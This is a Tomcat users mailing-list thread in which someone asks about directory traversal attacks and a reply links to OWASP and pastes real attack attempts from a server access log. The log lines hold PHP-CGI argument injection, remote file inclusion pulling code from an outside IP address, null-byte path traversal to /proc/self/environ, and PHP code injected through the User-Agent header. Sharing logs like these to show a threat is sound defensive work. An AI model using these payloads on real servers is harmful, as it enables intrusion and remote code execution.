Athanasios Kostopoulos wrote:
On 22/11/12 10:52, Aditi Sinha wrote:
Hi Andre,
Agree with your points.
Just wanted to know more about “Directory Traversal Attack".
Can it lead to access of directories outside Tomcat/webapps folder also
or can it just try to access the applications within Tomcat/webapps
folder only?
Thanks & Regards,
Aditi
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org
Hi everyone,
OWASP maintains some nice resources about path traversal attacks. A nice
starting point is the following:
https://www.owasp.org/index.php/Path_Traversal
And for anyone that would think that this is not a genuine concern, here are a few recent
samples from a logfile of one of our servers (among many, many similar ones) :
173.45.104.226 - - [17/Nov/2012:15:55:27 +0100] "GET
/?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3d%2Fproc%2Fself%2Fenviron
HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:27 +0100] "GET
/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3d%2Fproc%2Fself%2Fenviron
HTTP/1.1" 404 359 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET
/?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F178.63.8.214%2Fecho.txt
HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET
/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F178.63.8.214%2Fecho.txt
HTTP/1.1" 404 359 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET
/?mod=http%3A%2F%2F178.63.8.214%2Fecho.txt HTTP/1.1" 200 45 "-" "<?php echo
\"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET
/?page=http%3A%2F%2F178.63.8.214%2Fecho.txt HTTP/1.1" 200 45 "-" "<?php echo
\"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET
/index.php?page=http%3A%2F%2F178.63.8.214%2Fecho.txt HTTP/1.1" 404 359 "-" "<?php echo
\"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET
/?page=../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 45 "-" "<?php echo
\"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET
/index.php?page=../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-" "<?php
echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:29 +0100] "GET
/?mod=../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 45 "-" "<?php echo
\"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:29 +0100] "GET
/index.php?mod=../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-" "<?php
echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:29 +0100] "GET
/main.php?x=../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "<?php echo
\"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org